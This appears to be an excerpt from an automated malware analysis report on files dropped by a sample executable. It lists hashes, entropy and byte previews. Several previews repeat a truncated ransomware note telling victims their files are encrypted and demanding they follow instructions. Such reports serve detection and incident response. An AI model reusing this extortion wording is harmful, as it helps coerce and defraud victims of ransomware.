.d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.o.d.
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):6680
                            Entropy (8bit):3.8419680745916676
                            Encrypted:false
                            SSDEEP:96:GLjiNsg3xU3TPTfI32yY+GTKw4R/N7t4p2nqIt6ixOZbYd9PrR5u:GLjZ3jrI323/uR/UknLQFZkDW
                            MD5:C4AE8614F7DD1E8F9474903596B17D0C
                            SHA1:419F30931FEF8DEF258C45AD2712E436AE35791D
                            SHA-256:55077AEAEB946594FFC07DAFC6D9BF2556028D1712EB4613F6886B50E4C24A7E
                            SHA-512:A8927B577C40A8C5575B69186FD95AFEB003E3DA46AF92AE4DD9ED51BA60422D75AFB9ADAB6584A13BD310D3AF01B3EF16D2EA16AD3F63701019E7597FDCF5D0
                            Malicious:false
                            Preview:-.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u. .c.o.m.p.u.t.e.r. .h.a.s. .e.x.p.a.n.s.i.o.n. .9.8.5.d.r.m.9.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.o.d.
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):6680
                            Entropy (8bit):3.8419680745916676
                            Encrypted:false
                            SSDEEP:96:GLjiNsg3xU3TPTfI32yY+GTKw4R/N7t4p2nqIt6ixOZbYd9PrR5u:GLjZ3jrI323/uR/UknLQFZkDW
                            MD5:C4AE8614F7DD1E8F9474903596B17D0C
                            SHA1:419F30931FEF8DEF258C45AD2712E436AE35791D
                            SHA-256:55077AEAEB946594FFC07DAFC6D9BF2556028D1712EB4613F6886B50E4C24A7E
                            SHA-512:A8927B577C40A8C5575B69186FD95AFEB003E3DA46AF92AE4DD9ED51BA60422D75AFB9ADAB6584A13BD310D3AF01B3EF16D2EA16AD3F63701019E7597FDCF5D0
                            Malicious:false
                            Preview:-.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u. .c.o.m.p.u.t.e.r. .h.a.s. .e.x.p.a.n.s.i.o.n. .9.8.5.d.r.m.9.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.o.d.
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):1250
                            Entropy (8bit):7.833883976207028
                            Encrypted:false
                            SSDEEP:24:Q43hrZtHxY7S0UdAoKIIDWp/u2t35PyW5A3relGiQacmfy:Qc/xY76d1KpaRLt356zalhQ66
                            MD5:012C3CC8C89653DE79B0AC01C706F3F1
                            SHA1:12CFB734188F225661027C9D61B4939E3B54D58E
                            SHA-256:0F4E3810DE8F1DFA56A953A6BCE1001D47A50B21A28822408A055B77150C88B8
                            SHA-512:C90C2F934EBB538E5E95E391E26EAF9E7A9A3BE579183CB6446340BA6A6F89958F6198204D293866298F2328306B1D2A43F496A9EEC235ABF124901DCAF47E58
                            Malicious:false
                            Preview:T.M.h....`...$.......A:V?{..{...3...]O...^.Ll.......h.t...... ..R..90E.=Ia...$R=..%9.......N..}.16.6.).a.....)..O.@u...(T..m2.~.........G..45...$T......"8..8v.IH)...d.G...T.k.18...\.......~.:.o..W..7.A..+..h.)".s.,..+.z..q9.v.{.Q.[hnx(..i...d...tG....pgXw..i.....:dmvqr|`.[M.yq..i.....V..s.../a....f.HQ.%O.X........C......~....P..R....z.a....z.....f...8..Y5..4.U.u09.0...,WT.\.....#......D....O...\6....S@..4.....;=.....EV......M...#..x.......q.!.|..@.3.j..[..@..).9a.............p..w...d.....e.^z..y.T..<.d.J..v,xg.]...WU.Vn.~SV......F.Y.\/........5....w~(.$.....j.....0...CEju.v.......v%o[.3O;y..!.vN.....hRX...X...\..+.T.N4.&|.~~*....E...N....E..54g.p...n...!mX#....L.......#..x*$B.M.)yD.A....\2.s.$..`1K7...m..gV...%.R.M....N+k.....-]0......P...G.$#.K@.%..xB.b.N..Gt.K..T..{..k......3.....*...%)..l.....K....;....pU....`8Yg.!3Y..r..R..pzU..\........... #.7:8..g.p'h.&.)._.,...Vz.<B.'\.......v....FeR.....*..}..+.w ec....K.h5...s!..8(O]...Aj...[..#.
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):6680
                            Entropy (8bit):3.8419680745916676
                            Encrypted:false
                            SSDEEP:96:GLjiNsg3xU3TPTfI32yY+GTKw4R/N7t4p2nqIt6ixOZbYd9PrR5u:GLjZ3jrI323/uR/UknLQFZkDW
                            MD5:C4AE8614F7DD1E8F9474903596B17D0C
                            SHA1:419F30931FEF8DEF258C45AD2712E436AE35791D
                            SHA-256:55077AEAEB946594FFC07DAFC6D9BF2556028D1712EB4613F6886B50E4C24A7E
                            SHA-512:A8927B577C40A8C5575B69186FD95AFEB003E3DA46AF92AE4DD9ED51BA60422D75AFB9ADAB6584A13BD310D3AF01B3EF16D2EA16AD3F63701019E7597FDCF5D0
                            Malicious:false
                            Preview:-.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u. .c.o.m.p.u.t.e.r. .h.a.s. .e.x.p.a.n.s.i.o.n. .9.8.5.d.r.m.9.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.o.d.
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):6680
                            Entropy (8bit):3.8419680745916676
                            Encrypted:false
                            SSDEEP:96:GLjiNsg3xU3TPTfI32yY+GTKw4R/N7t4p2nqIt6ixOZbYd9PrR5u:GLjZ3jrI323/uR/UknLQFZkDW
                            MD5:C4AE8614F7DD1E8F9474903596B17D0C
                            SHA1:419F30931FEF8DEF258C45AD2712E436AE35791D
                            SHA-256:55077AEAEB946594FFC07DAFC6D9BF2556028D1712EB4613F6886B50E4C24A7E
                            SHA-512:A8927B577C40A8C5575B69186FD95AFEB003E3DA46AF92AE4DD9ED51BA60422D75AFB9ADAB6584A13BD310D3AF01B3EF16D2EA16AD3F63701019E7597FDCF5D0
                            Malicious:false
                            Preview:-.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u. .c.o.m.p.u.t.e.r. .h.a.s. .e.x.p.a.n.s.i.o.n. .9.8.5.d.r.m.9.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.o.d.
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):1250
                            Entropy (8bit):7.865129054094111
                            Encrypted:false
                            SSDEEP:24:neVaLDS/ZIUcWGdZemKDrzEZyNt87nEyJdHylGiQacmLXGT:neF/Z/GtK7Y0tCnbJdHylhQ64
                            MD5:3FA38503928274C08DDD10BFEE16A814
                            SHA1:02939FF15FAC42E403EF97899625B7BA169D88C4
                            SHA-256:CFF4D26D0F6D2CF55B8C1597ABAA9FA92C9233DA6AC20A421C4DCFD988BAF3B7
                            SHA-512:BCEB6665145A59F58934AC20794BB277A826716AEB500EC929720101987338DA2DA7ECFD2D4967D36D74E642690B2652F938A67BCB4C567A3392E16870E1BC96
                            Malicious:false
                            Preview:.B.M.G..R...|+m.u..o..A'.......t...^S..FOK%Y6.K...ZER..i3S.Z.(x..5..4....6.Y....|.!.L.).F......S..0..>.s....[..(.G.g...^...BwR.......O..gF.a.6.;..S....Y...R.T.b{r......3.R.Sd..B~.`..K....D..&.#.kU=O.P.ERN...T1.........9.0q....{.=.4qX.u.sM..<I....}......C....d.S.Cg%]<...eG..-?n...k...1...hX7..."*qV..)..P.:G......=~.5....c.......a...5d.l.../..nQ..9....Y.n0.h5...5;hUK...*.j...twB...!...q...'.X...m./..Dh,X...w.-....a.3.[.A..;...T....g.-U..0#=...0..T...B.'.^......;p..H1..2......9.3u.<.....e.....l.*.........!.E.........$...l%.\st..$.x.{..d(6NL......y.&._Rag.i..36......]...@...8b...j.t..........fZ,.p...B3oy...#.7.....4...q.J).J>;.y..mT.e.n.....'~..u..*.i......Cs....[.......=..j........X.X..y.l.$..W....Wn.@1]....,2L<........xs...p.G.F."W3.l;.v{Zv.Gv.0.Y.`..+........E..c...?......uR.5.o..l.=...q.....T#..#.m3.9....$...&...E...v0G.!5.|J.g?.U.....KMO.....c.....l..ZN{_. ~.....k....W])..]s..v....>.X"Z|....;g\S..d...A..E.......M.........
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):1250
                            Entropy (8bit):7.848065625577398
                            Encrypted:false
                            SSDEEP:24:LinIp6aL0EFh3m4MgiUG+1w5XDqnlGiQacm5gvG:WIp3pW4niR+iz2lhQ65SG
                            MD5:733D61E9792B6DAC3806588E4A791E5C
                            SHA1:DA4892DCB7EDD101CEB1F3330028B27B3B3EC2DC
                            SHA-256:A7671CBB04FF9F76E62DDAFB0D636AB57995770097638CFAC3A2F952F7BCD2F1
                            SHA-512:859893E1497A9352A17D4C5BA1A998C8E39EA731BF75A8418CBAC5292B32B7A7DD50FA52FC1E66F83723495211E5AFD39CA210D6B6264046D0BDFC44E4C5DFF1
                            Malicious:false
                            Preview:jMe.:i.l.^.-Dl...(.t.Bx.$..6b.Ah.g....)Z*K.%SH.`.>........_k.LU,..B.M.Y#...l.5v....?......xy...6S....d.=.J.....HHu....o...r..X.e^.X.9....mS.........oBHUq.;.KTA....5.R..M...5...4W.;J..,.-.{.t...4. .!....L.......t..u.6........v..lG...H.MnSq."%.mF.3.n.!.l.w.%.......8.... .....m..`K..9....x>..x...;.f..^/.U...-.*.z........r....Q.`.Z..`.u..l..V.d.K...W.....[....h..&+.6)..{.f.T..p.[.......92L..FB..J. ......H.....J6G.....o...P.5..\H.<..S..?n....5......$..!.n..,....j.K\..._^.o.f.p..e...m@ ....\.tW.Xg.B1Y.$....m..P.....Td..w......$F$?#.....L....J..^!}.9]8.:G&....+.!...M..&'.Q)I....#L.4.Q....q.......[.[.....K....mj.....V.6.cq..u.R.rs.I...y}....8;.q..+.w.U.a....;.a.6.q c.....P<.g..2.......F....i..h.............w.+.....zD. ......BR...Z.'-u9<D..*r.l..>n-J.D.(..|.A...c.*Pn{;.C...@o..V.u.b.Pj..O...T5....+.a..W...9...Az...#.....qv0eGQ0....g.@..9M..R.|.UF........2./..A......O...dn...)...6...C..KG.:....J.E8...M`{...!............../{.h..
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):1250
                            Entropy (8bit):7.847183497669515
                            Encrypted:false
                            SSDEEP:24:K4ILrx5YlhRwFpyin3wrruzbAcVWG2dN/qbeFoX8zID1e4/jIT5lGiQacmcvm:K4IfLYlYFpyingrazBV0/CeFaNP8T5lp
                            MD5:98B76A1F635D2B2342CE7772A441B3E1
                            SHA1:8263A396AE2A71C6750F23464E6654A5954D8D46
                            SHA-256:A73D63DF6A35115A9F33FE4EB23805FF67DB64C9CD15DAC635F8E28F0ACDEEA5
                            SHA-512:1EFE916C4247D54EDC7E226F40EA9FB21361A4862A3D76648811165FC7904C4696EE5575CDB124EB9A9DFBD01631AD0C195B141B33D5B5B68FD6830FA3030448
                            Malicious:false
                            Preview:"B..g..j.;.....!;./...s...Q...=D.r..J....x1uWV..y]...M.....n..*..].J...9J...+..B.^].fHm&Oo..[e.....t9:=...M..O....U.....O.;....&..RK2...'7........~N.......=.]..h.U[..z..&f..]...p....1.3..k?.A......Q..)f........cWZ....b.@.q...,......'.|.km......i..Z.....".!.#s/.c..C1.Z..4.R.b_s.@z.....B(.]....q....!.....Ub./{...q..?%..p.........h.6......C....`...V....._..nh.D...VT...-^3&..aI.{b....Q..0....(8...g...<.we:No.Bm.@...9x.t8...nHD../........GX.#....M.Fo?6.......J..W.o.......|,.tN.(o...&..L@..B..dT.....l.).../'...O^.,ll#..Bw.....6N|.74}...B?..b.$.*...(. 0...^RM.|.}N....L....Y.+.T.q=N.d.V#.?..r.0...Ly.*.A...fO..,.V...w)...W.....=...R&..G..KE.......fO.g$.:.F...........@`.....WM....c.N/RG....z..'.C.Ej..D..7Aek....3..=.r.9.S...f...\.&g..N........1.......e.....V.)..).eS.$...G.P....O..i....a...7..n.N.5b.U..........,.9..[..v.4.R..8xz..c2.....@ r..x._...LL;$..NU..x.&M.<.I......f....Sj..o.I..C..V.~.Ik(+....K...~.rZ.\..v........3.
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):1250
                            Entropy (8bit):7.849663439507558
                            Encrypted:false
                            SSDEEP:24:KqKXPYNCPdVg9MxfSBEbeSxCZCGy/6YphKjejOYVGnYAYEKmyJme1P/N2Z2W2gPB:LQU6qClVeSxQPy/6ahjOOGvYEKmydqdd
                            MD5:B01746B70C36301DA8091E29A4434F32
                            SHA1:A05A79B93FC78BA42236B973B18BC552589E5236
                            SHA-256:E3F9C87688C7B55E0DC33909E9963D1A12ED6B0AA95A62B7AB78BA5CCCB50CEB
                            SHA-512:91030E86A2098AB5781F182A0D1AA750219634F817BDB5E92D885C905DF8C800A6EB815D8394CEC85B46EC5A304CDFC88C0E8649035C1ACDE054E9C3BEBC57F6
                            Malicious:false
                            Preview:x.I..?..5~.w...k.!.@..u.b.8........b.w.2.o....6..xK.@;.z..ze...{.5..I.<x~.dy3,...3 3.Y.SP].,....E..s.9[>8b./?L....4.@...;.l..f.c.......L........%u....VQ%.;(I.v...K.0h..7.E.g}.O.&P........1...ab..M.;..e.5..g.N....5......;...{..x<.pO.D~.c.q.5.l.3Nt....#bE.|.E....Y.....2l".2s.....eC.".X...O....n.<..F.Q,......y.....T...m.s.U,..a..f}W...k...u...G_h..]...&...F....9.....}c.w...B..2..(.OS..nU*..]R.a.i..............v....o..Q.D..*...A.=5...5........M...b.^^....{.3.(.7oxi..#8Z~...wi.G..*/...[N...5.&L.5.Xq.6F."......d..#...8....&.j.."...C..............W......K2..Wr|]..j...ok_..T..t._....?+..r.%B.6.=}c.[o.d;....Y...L...Qa...!.>n.e....k.V..$=.m"..oS.},.......:..#.G<H..qX.W{....P..>z...u....u.}.........&o.."U.0....U&..o.5......=i..9Er>b>.,J......f.".....7..An.,\}./K.S=P&.<.p...E.]......%J.$..[.O.F..o.^...!.M.{RN..). ....2<.q.wi`\..L..8.......P.i.kI....>i...FlZ.?.d...s.8.:.`..t...e..Z..Yc..]...V...9......ZSA......D.$a..hr..w}.:b....g~.}|..7.
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):1250
                            Entropy (8bit):7.840056392869682
                            Encrypted:false
                            SSDEEP:24:8XqqdH0nCYdIwDC7bDNxhxuANNHGgPHGDhgGk+TERbUGglGiQacm6:87dUPd7DYbJxbu8NHGg+1ibmlhQ66
                            MD5:539CC71ACAE743322B117B2500F8D1CF
                            SHA1:3A6E50DDAFFC30450F02044BE2E892C56B3662FD
                            SHA-256:A75A71835763CDF23C055D49BCB5E9055AD12FCE25B941B2B4A227AD35F87551
                            SHA-512:BCEBBB4088BFE3417E67D11A1AD4FFF71B5D1AD1BCDE338A6B4F558D6092713EF100F95BA4AAE5DDFE71F79354D277719471AC4ADAAB69C04EE81CAA4426D296
                            Malicious:false
                            Preview:...........:. ....bJ.v6.&.#z...;."...T.p..f$.$.......Z,9{..5+..&!...........bH...b)...Y..I..bY....p..)m....[k2Jfj...s+4.........}+<9F.'9.:Q..... <.p?...ZH.L...'$..zyQjFiE..O.2T...s..1...Wwg.....y<`7..e......{.._.". 2{I.%...XU&.Kcq`...}S.bO.j$.WRZ.U...[..Z.B.k..?G.V.!.c.. .<.Q....X..P`....Vp.....g.Ew.ai.....O...&..........t..gt:.Os.....K......[z!"#K.jW........Fc....2>...l.:k.....I/..X...g.+.g.].......,.E..)..v..TG+....E}.P.....W.$....Z._.U....\.g.Y.......&......F.....B.6..K.a2.>5.....7.....u.....,....e.a..$y.x....R.H..`..U.B..s.....e{..7...09]w.....;..~..M.]c.v....f...].\.Y(T.n..!e.....$.@...r...{.?6.I..i..b........R.e.|..k$......!.......[4..)....ILrv.KhF."..I.....H.O..a. gK..M............'j.DH......-'3`..._mF.........E.v.x>.p|.w.E_Q*..<]+.....E........... ..A..V...E...K]......`...FF.9.b._g.?H..%.........H.....<..w......9.P..('"-.`....]5W.s@....>E.k..[p.w..ray.T|...N.._...o..I...B.ez.[..A.7-....\...E..l.Z#...yB|H....h.tn..T2\..h. C>..J..:t...
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):1250
                            Entropy (8bit):7.850810971610496
                            Encrypted:false
                            SSDEEP:24:r9Reu41GF+HhLexC/JLmVbWxZxoHkYel0dEualq4yB3sCqiSdlGiQacmp:r9RO1GF+kmCVuZeEtl0dhH8kulhQ6p
                            MD5:2D0DABFA74A46ACBF700346D8DC6D647
                            SHA1:088580C9E0BD5D1DA9AE6BF2C7BE9C4750D83350
                            SHA-256:CE17A5BAB7ABA488475AE349B53DAA3C0F0C977E3D70619E9A81BCD5C42E13DC
                            SHA-512:8682C73A95108986CEB09510022FFFE932A922AE5237CE3F0CD1DDD723F0D535F06BA3AE7B23A56EFA6DFA3EEA002BA1DBC99A1A05D17069CBDD72B58FAE2915
                            Malicious:false
                            Preview:.7C....7rr.:.k..F/..zr.u..Yo.sC.y.Dv6~X...`#...|...:.....(....@B....~..#W..G...m}.3....Zng..G|.jLUc....6k1........,#G.#.(pi.B..k=|.R..?....O.H.v......P.f..J...i....R.C .s....;..q^4......4.UArt....*.j.k..N|_GJ.8...n1....#..Q..r.J..{l..Red.H..|...u...Q.VR,..q.d{l..n_-...E..N&EN.-H.j.+..U......X..v...m.....c..q... ..j..)....u&zxK../....."... ..\J...v....b.:..F..'......:N....U..n...\.....].{.T.cy.e.3..U.NM..).v;.}...:.............d.R...J">#[H...t...R3..G*O.V.1..O.e:~<..R.... ...R.......r..;...5O.,(.ay...:...x{A.</..B..v.{D...........<.....p...%.O.EP.....#>Bd.......v.H7..Ng.O...M..n..54#a..b.fROd...*+.c...../.a..'!........6...rt.....;H..Gd0...W=.X..|l.Bp.c.[{.-l..m..n......L=.y....@,.(.qkz..5o..q..Z..Y..m..b.....x..r.T9.2.8..I.2n0.c...a.).k...i...:.N...r..O..9.-1.]80..4..sg....&. J/.....k.,.....f..R../.g....# .~..-.$.....W......(N!.(1.U.Xe.D....>...*`9%..".K.J..l..R?].u.b.....U.....?..c_..pf..v....s.t....-.4>.K.'J..!3...v....Ys..|.P.f....M.|O7S....Z
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):1250
                            Entropy (8bit):7.843909551116373
                            Encrypted:false
                            SSDEEP:24:d4I3jS6pd6ldf5DrJsoLvKBNaBBmN541XYvrWLlGiQacmKi:d4IzJdodfZfLvG205G2GlhQ6Ki
                            MD5:DB73BD463A834B28B602DBD273FD4906
                            SHA1:40AB3A37D4FF7CFAC7AB97298827B322DCF66F78
                            SHA-256:5BD10DDDF380581FBE7EC55896289A0B24E47FAF6A9FC6D153B89E94AF7B2B89
                            SHA-512:2E4FDC980D268E5F248D4FA139C27752BB5105D0CD10CBE58F559EDFF30F4BB6EEB11174F4E8ABA4300898342B4843BC9B610A8C38E346AAECD695A86058ADE4
                            Malicious:false
                            Preview:..E`...=k.....0.A...:."....j.u....x}...OQ.`.'O....n!yFgV...2..mq..d..[o..k..v.;-1.#.8.U.?...T..7r.h.r.7"..|.F?9.\..;.E..=....`.zb>p....+......=I.J.rO94.....BA..0...<1.!+..1..........wT....R......|...I..........#.c..D..v;. I8..[.......1..y...?......-......./.R..m.V.}.8..E....q<#@.D.1.(*.bCm.......NJ.t[.n..).....):.\...t_..g..);.X.%.(..?.%I~.'.....5....I....~.1..@5...G.'...z........o..q..x).a5.2.@.(/........3..q._..n1n1N...`.....C.!..._.]!..4....."..4....D?\.W......E.?m.4.G......Z.g.........x*./T..Q.2..?..q..8.E...+ShJ....%0@....6aTT@.E.&'....Ua.3.lm]..o.....?E.\L..E.XF.....6....H..s..j2*....[.(8.V..&..O...\..w.....Z..P5'.s7....P.."..s..:@)1.#.T.[L5.3..O...V...`..x..K50..&R{..G.......7.D.U..av.........x5.o...\ ..n..$.'0.tFC...N..b..*.oJ7.Lp.j..,...."l..a.'...*^..D*~..[.RG...i..6.xC.YDl82...w...I..x-..........x.<......mG.u..../..P.{6..4C?..z..I.../p....O...8...l....*.P....A... ...b.X.d..A\xaE,h.$........#...>..^y"...$...F.O)G.TaO}.!.
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):1250
                            Entropy (8bit):7.859770767112801
                            Encrypted:false
                            SSDEEP:24:R//FGrDAFMax0YZD13+9CSuCRUVkpVpGqZ3WtQsHlGiQacmIJ/:VF7qaSYK5pRuaVEs0lhQ6IJ/
                            MD5:24D18E514BC127C5BF8B09B925BB0D3A
                            SHA1:39655895CEECD662DA0320E9A60BC7329177E08C
                            SHA-256:D4ACFA7CAB02C07570B5DD763EEEC9D04AB4FB276012DF9EFBB8A2B15A2D126D
                            SHA-512:A6DED6B5696AB67D0292BFA2547B217033E83B37DAD9328972794CC8196B56CD21FE99EBB4C999DF59640AD23AA505D4531E7C26B6039E20C4579C74BDE6C2ED
                            Malicious:false
                            Preview:..*..`...?.F.o..(.u?.0R.....W.mm..>6.......W.\..k^.S..kC,j..u*..Q.P..4.|.V......@......{-.).5..t..N.Ux..EI._M...H..nk..+.....*..Y./.Z..C.8.c.....{$&.@.lXa._.eX....1...?J`..+.+..uk.....*.#.B&.n e...5nZ9.kN....c...%2...\.Hf"........].#.I..\S.M......RGD......^..ZY..b.i...<h.}5.GA\...8'.CB.y..t..`...2A.4...........z..{r.R.,.\...+E>...8....b\......G...Mi..i..`^P.r....4.3a.$..X.9.O..|;~d.Su.D....%\Z..[.....{9\..N..3..R..k.g..x..>9.k.CE...+.F.,N...(.)*..k.kA`e?!.4. ..n.Z,D..7.a.Q.X...V..|.C....y..&Z......u.S...!\..FC7Dg.....=.J...U)."...-...I].m.Z...,ri..H.N?.....NN.w......{.Y.MOXg.H.C.d>A.d.k.i........1.'.UK.y..W.9..$..l......E1.g....~..K.p........}evN........A&j0.#...r.P.h..q........a.u......d,Lu.n.A...^..;.d1..P].V..|$..s.hh.U./...b.-.t....&.ci.?....:..[gmB..(:=.t........!..V.A.]5.q..tNv.DT2..0.X......&Z...[..9.v./|......%..|.cXMq..y......'.gclK".P.Dk...".%..C^BjDP....x...}....e.T.3....s.4)...k)U.7....._..i....X.1q...N.7.......n.3..@.7B
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):1250
                            Entropy (8bit):7.841078320878231
                            Encrypted:false
                            SSDEEP:24:TQgxCfPe9WclbFQVXD2SJiBngAtcybjWyKrrdlsm1+IblGiQacmVDD5n:jxCfYplbmBPJiBnnKR5n1zlhQ6V35n
                            MD5:5E67FF67B64140D31A55E201A9438977
                            SHA1:7C2982BF6C41A3E9B80B87779268078EB3E4DDCD
                            SHA-256:3515AEF886C6DDB45BFE2F88B34B9D51B9C0EBB445B1FA24E1E3F330BA405CD2
                            SHA-512:9AEED9420F1D0F17795BD1744B3125C3202BB1A28549845E3931A97646F459510906552B3D22D2FD7663A636955922C4BD9C8FB3506033F6816DAA28EC847FEE
                            Malicious:false
